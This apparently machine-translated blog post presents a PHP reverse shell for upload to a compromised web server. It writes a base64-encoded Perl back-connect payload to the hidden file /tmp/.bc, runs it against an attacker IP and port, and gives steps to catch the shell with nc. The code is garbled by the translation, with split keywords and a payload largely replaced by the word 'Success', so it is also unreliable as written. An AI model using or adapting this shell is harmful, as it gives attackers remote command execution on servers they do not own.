Php reverse shell implementation code

I was very helpless. I didn't think of any good solution. Then I came to the dark. Put a php page and the shell can be directly played back. Besides, the operations in the console are much more convenient than webshell, and there will be no timeout or other situations.
Because I don't know much about php, I found the wretched Nono and light rain and modified the code. The bounce code was extracted from phpspy2008, but it cannot be used directly, you need to change it to a separate PHP file. After the upload, listen to a local port, set the bounce IP address and port in the code, and then directly access the port, a shell will be returned.
Statement, no technical content, mainly for convenience. In this way, you can directly access this php page and directly play back the shell. You do not need to perform other tedious operations. The modified code is shown below.
Copy codeThe Code is as follows:
<? Php
Function which ($ pr ){
$ Path = execute ("which $ pr ");
Return ($ path? $ Path: $ pr );
}
Function execute ($ cfe ){
$ Res = '';
If ($ cfe ){
If (function_exists ('exec ')){
@ Exec ($ cfe, $ res );
$ Res = join ("\ n", $ res );
} Elseif (function_exists ('Shell _ exec ')){
$ Res = @ shell_exec ($ cfe );
} Elseif (function_exists ('system ')){
@ Ob_start ();
@ System ($ cfe );
$ Res = @ ob_get_contents ();
@ Ob_end_clean ();
} Elseif (function_exists ('passthru ')){
@ Ob_start ();
@ Passthru ($ cfe );
$ Res = @ ob_get_contents ();
@ Ob_end_clean ();
} Elseif (@ is_resource ($ f = @ popen ($ cfe, "r "))){
$ Res = '';
While (! @ Feof ($ f )){
$ Res. = @ fread ($ f, 1024 );
}
@ Pclose ($ f );
}
}
Return $ res;
}
Function cf ($ fname, $ text ){
If ($ fp = @ fopen ($ fname, 'w ')){
@ Fputs ($ fp, @ base64_decode ($ text ));
@ Fclose ($ fp );
}
}
$ Yourip = "your IP ";
$ Yourport = 'your port ';
$ Usedb = array ('perl '=> 'perl', 'c' => 'C ');
$ Back_connect = "success ".
"Success ".
"Success ".
"Success ".
"Success ".
"Success ".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw = ";
Cf ('/tmp/. bc', $ back_connect );
$ Res = execute (which ('perl '). "/tmp/. bc $ yourip $ yourport &");
?>

First execute nc-l-vv-p port locally and then access this php page http://www.site.com/fuck.php local will get a rebound shell.
This method is only applicable to the use of zombie streams. If you have any good method, please do not hesitate to give me a try.